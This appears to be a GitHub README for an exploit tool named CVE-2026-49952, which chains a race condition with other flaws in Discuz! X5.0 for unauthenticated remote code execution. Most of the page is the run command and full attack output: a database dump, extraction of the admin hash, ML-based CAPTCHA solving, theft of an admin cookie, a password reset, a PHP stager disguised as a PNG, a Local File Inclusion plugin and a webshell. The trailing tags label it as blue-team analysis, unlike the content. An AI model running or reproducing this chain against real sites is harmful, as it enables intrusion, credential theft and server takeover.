passwa11/CVE-2026-49952

GitHub: passwa11/CVE-2026-49952

This tool chains a race condition with several other security vulnerabilities in Discuz! X5.0 to achieve unauthenticated remote code execution.


# Setup

```
pip3 install Pillow torch torchvision
```

# Run

```
$ python3 exploit.py http://localhost/discuz5/
+----------------------------------------------------+
| Discuz! X5.0 Remote Code Execution Exploit by EgiX |
+----------------------------------------------------+
[+] Getting authcode for DB export
[+] Authcode: 61feiuI8ReSHRHUDKl2DXeB1QMcdNX6Mpu0gZ8OBS5qRgmQ6Jg3W6mrNVooNqITEtQOd4WUMlGNlQSz7WD6s
[+] Exporting DB
[+] Downloading DB dump
[+] Searching for admin's username and MD5 password hash
[+] Admin username: admin
[+] Admin MD5 password: 96b21b6bfc5fe6d4530f8345fbcfbc6d
[+] Registering new 'special' user
[+] Username: 96b21b6bfc5fe6d4530f8345fbcfbc6d 1 c55a895b
[+] CAPTCHA is enabled
[+] Downloading CAPTCHA
[+] CAPTCHA prediction: CY46
[+] Getting authcode for DB import
[+] Authcode: 553fh4gPsIhwsSdSKb1ti6SqITi945W2I%2BEyoYCMwVQeMqfyp4ekIwTPqzKkU7hfTHqVg0FhhR9Ic3kiUkkGVsbzkDOIcRpL7bCHUKRKha6KxPeOoud0qxEZPqk
[+] CAPTCHA is enabled
[+] Downloading CAPTCHA
[+] CAPTCHA prediction: CMJ6
[+] Performing race condition attack
[+] 🏆 Race condition attack success!
[+] Admin authentication cookie: ef196PBDlZZvpe3Fze5ZW36x3%2B7i9cukujemIqJ%2BH1vGJCBmVWLlNVa2OCnq2lAsLjFhrC5x55Wgh3mlqgSnlwXKRqvhQbDaZguSq5hboelr
[+] Waiting for the import process to finish
[+] Resetting admin password
[+] Performing login into admincp
[+] As admin: uploading PHP stager as PNG image
[+] As admin: importing fake plugin
[+] As admin: importing Local File Inclusion (LFI) plugin
[+] As admin: triggering PHP stager LFI
[+] Launching webshell

discuz-shell# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
discuz-shell# pwd
/var/www/html/discuz5
discuz-shell# exit
```
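Tags: CISA project, Discuz!, Python, web security, credential scanning, no backdoor, race condition, programming tools, blue team analysis, remote code execution, reverse engineering tools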